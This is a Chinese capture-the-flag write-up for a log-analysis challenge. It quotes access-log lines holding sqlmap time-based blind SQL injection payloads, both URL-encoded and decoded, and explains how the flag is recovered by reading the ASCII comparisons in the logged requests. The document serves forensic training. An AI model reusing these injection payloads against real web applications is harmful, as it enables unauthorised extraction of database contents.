日志题writeup

1、既然是日志分析，首先打开日志，access.log，摘取片段：

id=1%27%20aNd%20%28SelECT%204235%20fRom%20%28SelECT%28sleEp%281-%28If%28ORd%28MId%28%28SelECT%20IfNULL%28CaST%28%60flag%60%20aS%20nChar%29%2C0x20%29%20fRom%20sqli.%60flag%60%20ORdER%20bY%20%60flag%60%20LimIT%200%2C1%29%2C22%2C1%29%29%3E32%2C0%2C1%29%29%29%29%29dfEI%29%20aNd%20%27hbou%27%3D%27hbou HTTP/1.1" 200 729 "-" "sqlmap/1.4.4.6#dev (http://sqlmap.org)" 49.74.204.67 - - [22/Apr/2020:09:39:22 +0000] "GET /?id=1%27%20aNd%20%28sELeCT%204235%20frOM%20%28sELeCT%28sLeeP%281-%28If%28ORd%28MiD%28%28sELeCT%20IfNULL%28CaSt%28%60flag%60%20As%20NChar%29%2C0x20%29%20frOM%20sqli.%60flag%60%20ORdER%20bY%20%60flag%60%20liMit%200%2C1%29%2C22%2C1%29%29%3E1%2C0%2C1%29%29%29%29%29dfEI%29%20aNd%20%27hbou%27%3D%27hbou HTTP/1.1" 200 729 "-" "sqlmap/1.4.4.6#dev (http://sqlmap.org)"

因为常用的%27、%20分别是单引号和空格，怀疑是经过url编码的，使用在线反编码后，部分内容（由于太长，只能截断）是：

0,1),21,1))!=125,0,1)))))dfEI) anD 'hbou'='hbou HTTP/1.1" 200 729 "-" "sqlmap/1.4.4.6#dev (http://sqlmap.org)"49.74.204.67 - - [22/Apr/2020:09:39:22 +0000] "GET /?id=1' AnD (sEleCt 4235 FRom (sEleCt(SLeep(1-(If(oRd(mID((sEleCt IfNULL(CAst(`flag` As NcHAr),0x20) FRom sqli.`flag` oRdER By `flag` lIMIt 0,1),22,1))>64,0,1)))))dfEI) AnD 'hbou'='hbou HTTP/1.1" 200 729 "-" "sqlmap/1.4.4.6#dev (http://sqlmap.org)"49.74.204.67 - - [22/Apr/2020:09:39:22 +0000] "GET /?id=1' aNd (SelECT 4235 fRom (SelECT(sleEp(1-(If(ORd(MId((SelECT IfNULL(CaST(`flag` aS nChar),0x20) fRom sqli.`flag` ORdER bY `flag` LimIT 0,1),22,1))>32,0,1)))))dfEI) aNd 'hbou'='hbou HTTP/1.1" 200 729 "-" "sqlmap/1.4.4.6#dev (http://sqlmap.org)"49.74.204.67 - - [22/Apr/2020:09:39:22 +0000] "GET /?id=1' aNd (sELeCT 4235 frOM (sELeCT(sLeeP(1-(If(ORd(MiD((sELeCT IfNULL(CaSt(`flag` As NChar),0x20) frOM sqli.`flag` ORdER bY `flag` liMit 0,1),22,1))>1,0,1)))))dfEI) aNd 'hbou'='hbou HTTP/1.1" 200 729 "-" "sqlmap/1.4.4.6#dev (http://sqlmap.org)"

2、再观察日志，发现几个关键词sqlmap、select、id等，显然是被sqlmap扫描过，应该属于sql注入，尝试使用id=1' .....；等各种语句组合访问，但是无法访问。再查看题目，日志分析题目，应该考察离线分析。所以再次看日志，发现很有规律。一大段日志显示，讲sql.flag数据表当做nchar类型取出来，并和不同的ascii码比较，先比较范围，再比较!=，关键地方，我摘出来：

....
....flag` LImIt 0,1),1,1))!=102,0,1)))))....
....flag` lImiT 0,1),2,1))>96,0,1)))))d....
....
flag` LiMit 0,1),2,1))!=108,0,1)))))
`flag` limIt 0,1),3,1))>96,0,1)))))

很显然，攻击者已经猜对了第一个字节的字母，然后继续猜测第二个，而通过查询ascii表，发现
102 => ‘f’
108=> 'l'
最后会出现:flag{一系列字母}的结果，提交后就是结果。

日志题writeup

你可能感兴趣的:(日志题writeup)